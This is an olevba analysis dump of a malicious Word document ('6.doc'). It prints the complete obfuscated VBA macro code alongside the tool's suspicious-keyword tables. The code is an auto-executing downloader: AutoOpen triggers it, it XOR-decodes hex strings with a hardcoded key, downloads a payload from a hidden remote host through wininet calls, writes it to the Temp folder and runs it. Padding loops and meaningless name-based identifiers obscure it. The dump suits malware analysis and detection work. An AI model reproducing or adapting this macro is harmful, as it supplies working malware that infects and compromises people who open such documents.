Malicious Word macro

1. olevba 0.25 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- 6.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 6.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 6.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub TRENTON(MARCELINO As Long)
17. HARRIS
18. End Sub
19.  
20. Sub autoopen()
21. TRENTON (443)
22. End Sub
23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
24. ANALYSIS:
25. +----------+----------+---------------------------------------+
26. | Type     | Keyword  | Description                           |
27. +----------+----------+---------------------------------------+
28. | AutoExec | AutoOpen | Runs when the Word document is opened |
29. +----------+----------+---------------------------------------+
30. -------------------------------------------------------------------------------
31. VBA MACRO PERCY.bas
32. in file: 6.doc - OLE stream: u'Macros/VBA/PERCY'
33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
34.  
35. #If VBA7 And Win64 Then
36. Public Declare PtrSafe Function MICHEL Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal THERON As LongPtr, ByVal RAYMUNDO As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
37. #End If
38.  
39.  
40. Public Function GENARO(ByRef GRAHAM As Object, ByRef ISAIAH As String, VAUGHN As Double) As Boolean
41.  
42. Set AVERY = CreateObject _
43. (BENNETT _
44. (OCTAVIO, CORNELL))
45. Dim NORRIS As Integer
46. NORRIS = AVERY.Open(GRAHAM & ISAIAH)
47. End Function
48.  
49.  
50. Public Function GONZALO(DERICK As Long, RODRIGO As String, STACEY As String) As String
51. DERICK = DERICK * 2
52. GONZALO = BENNETT(RODRIGO, STACEY)
53.    
54. End Function
55.  
56. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
57. ANALYSIS:
58. +------------+----------------+-----------------------------------------+
59. | Type       | Keyword        | Description                             |
60. +------------+----------------+-----------------------------------------+
61. | Suspicious | CreateObject   | May create an OLE object                |
62. | Suspicious | Lib            | May run code from a DLL                 |
63. | Suspicious | Open           | May open a file                         |
64. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
65. |            |                | may be used to obfuscate strings        |
66. |            |                | (option --decode to see all)            |
67. | IOC        | wininet.dll    | Executable file name                    |
68. +------------+----------------+-----------------------------------------+
69. -------------------------------------------------------------------------------
70. VBA MACRO CLAY.bas
71. in file: 6.doc - OLE stream: u'Macros/VBA/CLAY'
72. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
73.  
74. #If VBA7 And Win64 Then
75. Public Declare PtrSafe Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal DALTON As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
76. #End If
77. Public Function GERMAN(ByRef WILMER As String, ByRef GIOVANNI As Long) As Integer
78.  GERMAN = Val("&H" & (BERNIE(62, WILMER, FLETCHER(GIOVANNI), 2)))
79. End Function
80. Public Function FLETCHER(ByRef GIOVANNI As Long) As Long
81.  FLETCHER = (2 * GIOVANNI) - 1
82. End Function
83.  
84.  
85. Public Function BENNETT(HERSCHEL As String, WILMER As String) As String
86.    
87.     Dim NUMBERS As Integer
88.     Dim BUFORD As Integer
89.    
90.    
91.     Dim SANFORD As Long
92.  SANFORD = 221
93. If SANFORD > SANFORD * 4 Then End
94.    
95.     Dim GIOVANNI As Long
96.     Dim BARNEY As String
97.     For GIOVANNI = 1 To (NESTOR(WILMER) / 2)
98.         NUMBERS = GERMAN(WILMER, GIOVANNI)
99.         BUFORD = LAVERNE(HERSCHEL, GIOVANNI)
100.         BARNEY = BARNEY + BRANDEN(NUMBERS, BUFORD)
101.     Next GIOVANNI
102.    BENNETT = BARNEY
103. End Function
104.  
105.  
106.  
107. Public Sub HARRIS()
108.         Dim BERT As Double
109.  
110.     Dim SILAS As Double
111. For SILAS = 67 To 68
112. SILAS = SILAS + 99
113. Next SILAS
114.  
115. FREDERIC (5.09)
116.  
117. End Sub
118. Public Function MERRILL(MERLIN As String)
119. Dim IRWIN As String
120. IRWIN = "KIRBY"
121. CLEMENT 44 + 0.33
122. IRWIN = IRWIN + "CRUZ"
123. End Function
124.  
125.  
126.  
127.  
128.  
129.  
130. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
131. ANALYSIS:
132. +------------+----------------+-----------------------------------------+
133. | Type       | Keyword        | Description                             |
134. +------------+----------------+-----------------------------------------+
135. | Suspicious | Lib            | May run code from a DLL                 |
136. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
137. |            |                | may be used to obfuscate strings        |
138. |            |                | (option --decode to see all)            |
139. | IOC        | wininet.dll    | Executable file name                    |
140. +------------+----------------+-----------------------------------------+
141. -------------------------------------------------------------------------------
142. VBA MACRO ROLANDO.bas
143. in file: 6.doc - OLE stream: u'Macros/VBA/ROLANDO'
144. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
145.  
146.  
147.  
148. Public Function RIGOBERTO(ALPHONSO As Long, ByVal SHELBY As String) As Boolean
149.     #If VBA7 And Win64 Then
150.         Dim RICKIE As LongPtr, BOBBIE As LongPtr
151.     #Else
152.         Dim RICKIE As Long, BOBBIE As Long
153.     #End If
154.     Dim MAURICIO As Long
155.     Dim SONNY As String * PASQUALE, DALTON As String
156.     Dim QUINCY As Integer, SEBASTIAN As Double
157.     RICKIE = EFRAIN
158.     If RICKIE = 0 Then
159.         Exit Function
160.     End If
161.     Dim FEDERICO As Boolean
162.    
163.     If CLIFF(BOBBIE, RICKIE) Then
164.     End If
165.     If BOBBIE = 0 Then
166.         SEBASTIAN = 0
167.     Else
168.         ULYSSES BOBBIE, SONNY, PASQUALE, MAURICIO
169.         DALTON = SONNY
170.           Dim JACKSON As Integer
171.           JACKSON = 0
172.           JACKSON = JACKSON + 33
173. If JACKSON > JACKSON + 40 Then End
174.         Do While MAURICIO <> 0
175.             ULYSSES BOBBIE, SONNY, PASQUALE, MAURICIO
176.                     DALTON = DALTON + Mid(SONNY, 1, MAURICIO)
177.         Loop
178.              SEBASTIAN = NESTOR(DALTON): _
179.              QUINCY = DONNELL("DAVIS")
180.         Open SHELBY _
181.             For Binary Access Write _
182.         Lock Write As #QUINCY
183.         Put #QUINCY, , DALTON
184.         JACKSON = JACKSON + 62
185.     If JACKSON < 0 Then End
186.         Close #QUINCY
187.     End If
188.     GAVIN BOBBIE
189.     GAVIN RICKIE
190.     DALTON = ""
191.     If SEBASTIAN Then
192.         RIGOBERTO = True
193.     End If
194. End Function
195.  
196. Public Function CLEMENT(ODELL As Double)
197.  
198. Dim GONZALO As Object
199.  
200.  
201.     Dim MAXWELL As Long
202. For MAXWELL = 16 To 17
203. MAXWELL = MAXWELL + 17
204. Next MAXWELL
205.    
206.  
207. Dim ELLIS  As Object
208.  
209.  
210. For MAXWELL = 11 To 21
211. MAXWELL = MAXWELL + 64
212. Next MAXWELL
213.    
214.  
215. Set ELLIS = LAURENCE
216. MAXWELL = MAXWELL + 35
217. Dim LEWIS As Boolean
218.  
219. If MAXWELL > MAXWELL * 333 Then End
220. LEWIS = JARVIS(GONZALO, ELLIS)
221. ODELL = ODELL + 14
222. End Function
223.  
224.  
225. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
226. ANALYSIS:
227. +------------+---------+-----------------------------------------+
228. | Type       | Keyword | Description                             |
229. +------------+---------+-----------------------------------------+
230. | Suspicious | Open    | May open a file                         |
231. | Suspicious | Write   | May write to a file (if combined with   |
232. |            |         | Open)                                   |
233. | Suspicious | Put     | May write to a file (if combined with   |
234. |            |         | Open)                                   |
235. | Suspicious | Binary  | May read or write a binary file (if     |
236. |            |         | combined with Open)                     |
237. +------------+---------+-----------------------------------------+
238. -------------------------------------------------------------------------------
239. VBA MACRO CORNELIUS.bas
240. in file: 6.doc - OLE stream: u'Macros/VBA/CORNELIUS'
241. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
242.  
243. Option Explicit
244.  
245. #If VBA7 And Win64 Then
246. Public Declare PtrSafe Function ULYSSES Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal SONNY As String, ByVal SHELTON As Long, CARSON As Long) As Integer
247. #End If
248. Public Const CORNELL = "062F303F38670F3529233C2D2642283A29"
249. Public Const AURELIO = "09373C36263B2B73772A2D2B"
250. Public Const WINFRED = "3D3321236E6661273C3F3827295E223D2E7B303B24617D6A60637F69533930"
251. Public Const COLLIN = "0624273A243D272B3E6113272B53122C34213639062C2F3C2C21"
252. Public Const OCTAVIO = "AUGUSTINEYOUNG6"
253.  
254.  
255.  
256. Public Const PASQUALE = 4800
257. Public Const MOHAMMAD As String = "LEONEL"
258. Public Const MARIANO = 1
259. Public Const DANIAL = &H4000000
260.  
261. Sub FREDERIC(SANTOS As Double)
262.  
263. MERRILL ("BLAIRLANDON")
264. End Sub
265.  
266. Public Function BRANDEN(ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
267.     BRANDEN = Chr(NUMBERS Xor BUFORD)
268. End Function
269.  
270.  
271.  
272.  
273.  
274. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
275. ANALYSIS:
276. +------------+----------------+-----------------------------------------+
277. | Type       | Keyword        | Description                             |
278. +------------+----------------+-----------------------------------------+
279. | Suspicious | Lib            | May run code from a DLL                 |
280. | Suspicious | Chr            | May attempt to obfuscate specific       |
281. |            |                | strings                                 |
282. | Suspicious | Xor            | May attempt to obfuscate specific       |
283. |            |                | strings                                 |
284. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
285. |            |                | be used to obfuscate strings (option    |
286. |            |                | --decode to see all)                    |
287. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
288. |            |                | may be used to obfuscate strings        |
289. |            |                | (option --decode to see all)            |
290. | IOC        | wininet.dll    | Executable file name                    |
291. +------------+----------------+-----------------------------------------+
292. -------------------------------------------------------------------------------
293. VBA MACRO LAMAR.bas
294. in file: 6.doc - OLE stream: u'Macros/VBA/LAMAR'
295. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
296.  
297.  
298.  
299.  
300. Public Const JASPER = "RUSSEL"
301. #If VBA7 And Win64 Then
302. #Else
303. Public Declare Function GAVIN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
304. Public Declare Function SAMMIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal DALTON As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
305. Public Declare Function ULYSSES Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal SONNY As String, ByVal SHELTON As Long, CARSON As Long) As Integer
306. Public Declare Function MICHEL Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal THERON As Long, ByVal RAYMUNDO As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
307. #End If
308.  
309.  
310. Public Function LAVERNE(ByRef HERSCHEL As String, ByRef GIOVANNI As Long) As Integer
311. LAVERNE = Asc(BERNIE(71, HERSCHEL, ((GIOVANNI Mod NESTOR(HERSCHEL)) + 1), 1))
312. End Function
313. Public Function BERNIE(SAMMY As Long, ByRef JAYSON As String, ByRef NUMBERS As Integer, ByRef BUFORD As Integer) As String
314.     BERNIE = Mid$(JAYSON, NUMBERS, BUFORD)
315.     SAMMY = SAMMY + 31
316. End Function
317. #If VBA7 _
318.     And Win64 Then
319. Public Function EFRAIN() As LongPtr
320.  #Else
321. Public Function EFRAIN() As Long
322.  
323.  #End If
324.  
325.  EFRAIN = SAMMIE(MOHAMMAD, MARIANO, vbNullString, vbNullString, 0)
326. End Function
327.  
328. Public Function NESTOR(JAYSON As String) As Long
329. NESTOR = Len(JAYSON)
330. End Function
331.  
332.  
333.  
334.  
335.  
336. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
337. ANALYSIS:
338. +------------+----------------+-----------------------------------------+
339. | Type       | Keyword        | Description                             |
340. +------------+----------------+-----------------------------------------+
341. | Suspicious | Lib            | May run code from a DLL                 |
342. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
343. |            |                | may be used to obfuscate strings        |
344. |            |                | (option --decode to see all)            |
345. | IOC        | wininet.dll    | Executable file name                    |
346. +------------+----------------+-----------------------------------------+
347. -------------------------------------------------------------------------------
348. VBA MACRO DEXTER.bas
349. in file: 6.doc - OLE stream: u'Macros/VBA/DEXTER'
350. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
351.  
352.  
353. Public Function LAURENCE() As Object
354. Dim ISMAEL As String
355. ISMAEL = BENNETT(OCTAVIO, COLLIN)
356. Set LAURENCE = CreateObject(ISMAEL)
357. End Function
358. #If VBA7 And Win64 Then
359.        Public Function CLIFF(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
360.     #Else
361.        Public Function CLIFF(ByRef GRADY As Long, NOAH As Long) As Boolean
362.     #End If
363.         Dim JACQUES As Double
364. Dim GUADALUPE As String
365. Dim CLARK As Long
366.     GUADALUPE = GONZALO(893, OCTAVIO, WINFRED)
367.  
368. For JACQUES = 14 To 15
369. JACQUES = JACQUES + 5.5
370. Next JACQUES
371.     GRADY = MICHEL(NOAH, GUADALUPE, vbNullString, 0, DANIAL, 0)
372.     CLIFF = True
373. End Function
374.  
375.  
376. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
377. ANALYSIS:
378. +------------+--------------+--------------------------+
379. | Type       | Keyword      | Description              |
380. +------------+--------------+--------------------------+
381. | Suspicious | CreateObject | May create an OLE object |
382. +------------+--------------+--------------------------+
383. -------------------------------------------------------------------------------
384. VBA MACRO AMOS.bas
385. in file: 6.doc - OLE stream: u'Macros/VBA/AMOS'
386. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
387.  
388.  
389. #If VBA7 And Win64 Then
390. Public Declare PtrSafe Function GAVIN Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
391. #End If
392.  
393. Public Function JARVIS(ByRef GRAHAM As Object, ByRef HOMER As Object) As Boolean
394.  
395. Dim HARRISON As Long
396. Set GRAHAM = IGNACIO(LAURENCE)
397.  
398. Dim ADOLFO
399.  
400. Dim ISAIAH As String
401. ISAIAH = GONZALO(4096, OCTAVIO, AURELIO)
402.  
403. For HARRISON = 6 To 8
404. HARRISON = HARRISON * 55
405. Next HARRISON
406. ADOLFO = GRAHAM & ISAIAH
407.  
408. If RIGOBERTO(354, ADOLFO) Then
409. End If
410.  
411.  
412. JARVIS = GENARO(GRAHAM, ISAIAH, 213)
413.  
414. End Function
415. Public Function DONNELL(JAYSON As String) As Integer
416.     DONNELL = FreeFile
417. End Function
418.  
419. Public Function IGNACIO(ByRef NICHOLAS As Object) As Object
420. Set IGNACIO = NICHOLAS.GetSpecialFolder(2)
421. End Function
422.  
423. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
424. ANALYSIS:
425. +------------+-------------+-------------------------+
426. | Type       | Keyword     | Description             |
427. +------------+-------------+-------------------------+
428. | Suspicious | Lib         | May run code from a DLL |
429. | IOC        | wininet.dll | Executable file name    |
430. +------------+-------------+-------------------------+